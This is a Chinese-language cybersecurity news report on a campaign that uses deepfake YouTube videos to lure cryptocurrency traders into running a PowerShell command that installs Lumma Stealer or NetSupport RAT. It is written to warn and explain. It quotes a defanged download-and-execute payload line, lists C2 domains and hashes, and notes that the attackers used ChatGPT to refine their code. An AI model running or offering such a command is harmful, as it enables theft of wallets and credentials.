新一波的 “自骗” 攻击浪潮正在利用 AI 生成的深度伪造视频和恶意脚本,目标锁定加密货币爱好者和金融交易者,标志着社会工程战术的危险演变。
据网络安全研究公司 Gen Digital 发现,这场活动利用经过验证的 YouTube 频道、合成人物和 AI 制作的有效载荷,操纵受害者主动破坏自己的系统。
这种攻击在 2024 年第三季度激增了 614%,结合了尖端的深度伪造技术和精心设计的心理诱饵,引发了对生成式 AI 在网络犯罪中武器化的紧迫担忧。
安全分析师指出,该操作始于一个托管在拥有 11 万订阅者的被攻陷 YouTube 频道上的深度伪造视频。
视频中出现了一个名为 “托马斯・哈里斯” 或 “托马斯・罗伯茨” 的合成人物,利用先进的面部动画、语音合成和身体动作复制技术制作而成。
尽管该频道看起来合法,包括从 TradingView 重新发布的内 容,但未列出的教程视频指导观众激活一个虚构的 “AI 驱动的开发者模式”,声称该模式可以以 97% 的准确率预测加密货币市场趋势。
攻击的核心在于使用 AI 生成的脚本设计来规避怀疑。观众被引导打开 Windows 的运行对话框(Win+R)并执行一个从 paste-sharing 网站(如 Pastefy[.]com 或 Obin[.]net)获取恶意脚本的 PowerShell 命令。
研究人员解密的一个代表性有效载荷显示攻击者使用 ChatGPT 来优化他们的代码:
iex (New-Object Net.WebClient).DownloadString(‘hxxps://pastefy[.]com/raw/AbCdE123’)
该脚本连接到一个命令与控制(C&C)服务器——最近被追踪为 developer-update[.]dev 或 developerbeta[.]dev——以部署 Lumma Stealer 或 NetSupport 远程访问工具。
前者窃取加密货币钱包和浏览器凭据,而后者则授予对系统的完全控制。取证分析揭示了关键组件的 SHA-256 哈希值,包括:
a5e0635363bbb5d22d5ffc32d9738665942abdd89d2e6bd1784d6a60ac521797(恶意 PowerShell 脚本)
2fe60aa1db2cf7a1dc2b3629b4bbc843c703146f212e7495f4dc7745b3c5c59e(Lumma Stealer 变种)
至关重要的是,深度伪造视频通过程序细节隐藏了其人工性质——一个合成声音解释了如何通过添加注册表排除项来绕过 Windows Defender,而屏幕上的按键操作则模仿了真实的 TradingView 工作流程。
攻击者还通过 YouTube 的赞助广告系统进一步扩大了攻击范围,针对观看合法金融内容的用户。
与传统的网络钓鱼不同,受害者主动参与了他们的系统被破坏的过程,认为他们正在访问独家工具。随着网络犯罪分子现在正在自动化人物创建和脚本优化,通过多个渠道验证数字指令已成为一种不可或缺的安全实践。
发表评论